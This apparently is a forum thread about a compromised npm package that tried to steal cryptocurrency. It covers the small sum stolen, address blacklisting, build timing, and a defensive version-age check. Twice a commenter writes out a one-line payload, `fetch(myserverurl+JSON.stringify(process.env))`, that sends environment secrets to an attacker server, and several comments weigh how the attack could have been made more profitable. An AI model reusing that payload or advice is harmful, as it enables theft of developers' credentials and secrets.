
How much money have the attackers stolen so far? Has someone done an analysis of the blockchains for the destination addresses?


Click through to the article; it has a link to a view that lists the laughable profit.


I'm actually shocked they have not stolen more, given the breach's impact radius. Perhaps we can thank wallets and exchanges for blacklisting the addresses and showing huge warnings like the one shown in the article.


It was discovered pretty quickly; I don't think most "big" projects update their packages within minutes of publication.


Really, I'd say the key here is timing. I didn't look into what time the NPM packages were updated, but there are a few key times depending on which markets you're targeting. If it were Indian devs it would be around 2 AM CST, and if it's US devs it would be around 10 AM CST.

This is when I see the ramp-up in queuing of CI/CD builds that lasts a few hours across companies and is more likely to trigger a package getting rebuilt.
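The two comments above both come down to a delay: the compromise was caught before most projects rebuilt against the new version. The usual way to turn that delay into policy is to refuse versions younger than some minimum release age (npm's built-in `--before=<date>` install option does this for a whole tree). Below is an added example, not code from the thread or from any package discussed in it, that applies the rule to the `time` map a registry returns for a package; the version numbers, dates and the seven-day threshold are constructed for illustration.

```javascript
'use strict';

// Parses "x.y.z" into numbers. Prereleases such as "4.2.0-rc.1" return null
// so the gate never selects them.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  return m ? m.slice(1, 4).map(Number) : null;
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// timeMap is the "time" object from a registry package document
// (https://registry.npmjs.org/<name>): { created, modified, "<version>": ISO }.
// Returns the highest release published at least minAgeMs before `now`,
// or null when nothing is old enough.
function pickMatureVersion(timeMap, now, minAgeMs) {
  const cutoff = now.getTime() - minAgeMs;
  let best = null;
  for (const [version, published] of Object.entries(timeMap)) {
    const parsed = parseVersion(version);
    if (!parsed) continue;                       // skips created/modified/prereleases
    if (Date.parse(published) > cutoff) continue; // too young
    if (!best || compareVersions(parsed, best.parsed) > 0) best = { version, parsed };
  }
  return best ? best.version : null;
}

// Equivalent cutoff expressed as npm's real --before option, for whole-tree installs.
function beforeFlag(now, minAgeMs) {
  return '--before=' + new Date(now.getTime() - minAgeMs).toISOString();
}

const DAY_MS = 24 * 60 * 60 * 1000;

// Constructed registry metadata (assumption, not real data): 4.1.3 went out
// thirteen minutes before "now".
const SAMPLE_TIME = {
  created: '2020-01-10T12:00:00.000Z',
  modified: '2024-06-03T13:27:00.000Z',
  '4.1.0': '2024-01-02T09:00:00.000Z',
  '4.1.1': '2024-03-19T15:30:00.000Z',
  '4.1.2': '2024-05-20T08:45:00.000Z',
  '4.2.0-rc.1': '2024-05-30T10:00:00.000Z',
  '4.1.3': '2024-06-03T13:27:00.000Z',
};
const SAMPLE_NOW = new Date('2024-06-03T13:40:00.000Z');

if (typeof require !== 'undefined' && require.main === module) {
  console.log('no minimum age :', pickMatureVersion(SAMPLE_TIME, SAMPLE_NOW, 0));
  console.log('7-day minimum  :', pickMatureVersion(SAMPLE_TIME, SAMPLE_NOW, 7 * DAY_MS));
  console.log('npm flag       :', beforeFlag(SAMPLE_NOW, 7 * DAY_MS));
}
```

With a seven-day minimum the gate resolves to 4.1.2 and ignores the minutes-old 4.1.3; with no minimum it takes 4.1.3. The same cutoff passed as `npm install --before=...` applies the rule to every package in the tree rather than one at a time.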


It was also packages that, in my experience, don't often find themselves on the frontend.


- The attack it shipped was not a great fit for the packages compromised. `fetch(myserverurl+JSON.stringify(process.env))` would be a much more profitable payload.
- Naive obfuscation makes lights go red in so many places it'd be better to not obfuscate at all.
- The addresses were marked as malicious by Blockaid sooner than the package could reach production in most apps. Most wallets were ready to warn users early enough.


Huh. I read TFA in detail (and shared it with my team), but I didn't see any analysis. (?)


> I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

> Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers.

I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you can tell whether a donation is a worthless mockery donation.


I work with people who understand this stuff :D But if I see a transaction for thousands or millions of a coin I've never heard of with a $ value of about 1, it's likely a shitcoin and, I am guessing, mockery.


It seems to be this: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

500 USD, not bad for a month of work if the author is from a 3rd world country.


"3rd world country" is an outdated Cold War phrase usually incorrectly used to describe wealth or development status (it originally meant "anything not NATO or Warsaw Pact"); China is a third world country by that metric, but it's the second richest country (by GDP) in the world.

"Developing" or "poor" country may be a more accurate phrase.


Developers in 3rd world countries routinely earn more than that.

A shitty junior developer in Ecuador easily pulls 700-800 per month. If they are at all competent, they can double that at an outsourcing consultancy.


There's only one transaction that's making up most of it. Someone lost a serious 0.1 ETH or so.

$500 is nothing. It's what unsophisticated phishing makes in a day. It's what a support-call scammer makes for their owner in a day.

This was an attack on legitimate npm packages that end up on maybe hundreds of thousands of developer machines building tens of thousands of applications.

`fetch(myserverurl+JSON.stringify(process.env))` would be orders of magnitude more profitable as a payload.




